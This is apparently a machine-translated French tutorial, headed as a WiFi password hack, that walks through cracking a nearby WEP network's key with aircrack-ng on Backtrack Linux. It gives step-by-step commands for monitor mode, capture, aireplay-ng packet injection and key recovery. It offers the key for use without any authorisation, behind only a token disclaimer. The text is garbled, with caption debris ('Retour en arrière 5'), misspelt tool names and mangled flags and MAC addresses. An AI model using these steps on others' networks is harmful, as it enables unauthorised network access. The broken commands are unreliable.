REMARQUE: Ce Tutoriel Est Uniquement À Des Fins Éducatives, Ne L’Utilisez Pas À Mauvais Escient, Nous N’Assumerons Aucune Responsabilité S’Il Est Mal Utilisé!

 Comment déchiffrer le mot de passe WiFi (pirate de mot de passe WiFi)

Exigences:

Voici ce dont vous auriez besoin pour casser une clé WEP:

1. Backtrack ou toute autre distribution Linux avec aircrack-ng installée

2. Un adaptateur Wifi capable d’injecter des paquets, Pour ce tutoriel, j’utiliserai Alfa AWUS036H qui est une carte très populaire et qui fonctionne bien avec Backtrack

Vous pouvez trouver des listes de cartes wifi compatibles ICI

Étape 1:

Connectez-vous à votre Backtrack linux et branchez l’adaptateur Wifi, puis ouvrez le nouveau consol et commencez à taper les commandes suivantes:

ifconfig wlan0 up

Ici wlan0 est le nom de la carte sans fil, il peut être différent pour votre case.To voir toutes les cartes connectées à votre système tapez simplement « iwconfig » ou vous pouvez le trouver en tapant « airmon-ng ». airmon-ng

Étape 2:

Vous devez mettre votre adaptateur sans fil en mode moniteur, pour ce faire tapez la commande suivante:

airmon-ng start (votre interface)

Exemple: airmon-ng start wlan0

Maintenant, lorsque la nouvelle interface mon0 sera créée, vous pouvez voir la nouvelle interface en tapant « iwconfig mon0 « 

 Retour en arrière 5

 Retour en arrière 5

Étape 3:

Maintenant, vous devrez trouver le réseau WEP autour de vous, vous pouvez le faire en tapant la commande suivante:

airdump-ng mon0

Après avoir tapé le coomand vous verrez tout le WIFI disponible

 Backtrack 5

Dans ceci, Bssid montre l’adresse mac de l’AP, CH montre le canal dans lequel AP est diffusé et Essid montre le nom diffusé par l’AP, Cipher montre le type de cryptage.
Recherchez le réseau protégé WEP dans ce tutoriel, nous prenons « pack » comme cible.

 Retour en arrière 5

Étape 4:

Afin de carck le WEP, vous devrez capturer toutes les données de la cible dans un fichier.Pour ce faire, tapez la commande suivante et vous devez également accélérer le processus.

airodump-ng mon0-bssid-c(canal)-w(nom de fichier à enregistrer )

 Retour en arrière 5

Dans mon cas, le canal est 6 et a bssid comme 00: 26: 75: 06: CF; C6 et je vais enregistrer les données capturées en tant que « wep ».

 Retour en arrière 5

Étape 5:

Afin d’accélérer le taux de capture, ouvrez le nouveau terminal et tapez:

aireplay–ng-1 3-a (bssid de la cible) (interface)

 Retour en arrière 5

dans mon cas:
aireplay-ng–1 3-a 00:26:75:06: CF; C6 mon0

tapez maintenant la commande suivante:

aireplay-ng-2-p 0841-c ff: ff: ff: ff: ff: ff-b(bssid de la cible) (interface)

et appuyez sur  » y  » lorsqu’on lui demande d’utiliser ce paquet.

 Retour en arrière 5
 Retour en arrière 5

dans mon cas :
aireplay-ng-2-p 0841-c ff: ff:ff:ff:ff-b 00:26:75:06:CF;C6) mon0

 Retour en arrière 5

Étape 6:

Ouvrez un nouveau terminal et tapez

aircrack-ng-n 64-b (bssid) fichier enregistré

 Backtrack 5

dans mon cas:
aircrack-ng-n 64-b00:26:75:06: CF; C6 wep

 Backtrack 5

Une fois le craquage réussi, vous recevrez une clé, retirez simplement les deux-points entre la clé et utilisez-la.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.